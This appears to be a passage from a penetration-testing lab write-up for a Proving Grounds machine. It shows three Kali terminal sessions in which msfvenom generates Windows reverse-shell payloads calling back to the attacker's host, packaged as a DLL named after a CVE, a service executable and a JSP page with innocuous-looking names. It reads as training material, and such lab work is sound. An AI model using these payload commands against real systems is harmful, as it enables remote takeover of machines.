msfvenom
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=$tun0 LPORT=1234 -f dll -o CVE-2019-18194.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: CVE-2019-18194.dll
msfvenom generated a x86 reverse shell DLL
msfvenom 2
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=$tun0 LPORT=1235 -f exe -o domain1Service.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: domain1Service.exe
msfvenom generated a x86 reverse shell executable
msfvenom 3
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=$tun0 LPORT=4444 -f jsp -o About.jsp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of jsp file: 149025 bytes
Saved as: About.jsp
msfvenom generated a JSP reverse shell